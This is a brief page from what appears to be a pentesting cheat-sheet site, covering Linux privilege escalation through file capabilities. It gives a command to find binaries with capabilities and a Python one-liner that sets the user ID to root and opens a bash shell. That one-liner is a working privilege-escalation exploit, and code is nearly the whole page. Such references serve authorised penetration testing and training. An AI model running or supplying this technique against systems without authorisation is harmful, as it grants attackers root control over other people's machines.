> For the complete documentation index, see [llms.txt](https://pentesting.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.mrw0l05zyn.cl/escalamiento-de-privilegios/linux-unix/capabilities.md).

# Capabilities

## General

```sh
getcap -r / 2>/dev/null
```

## Python

```sh
/usr/bin/<python> -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
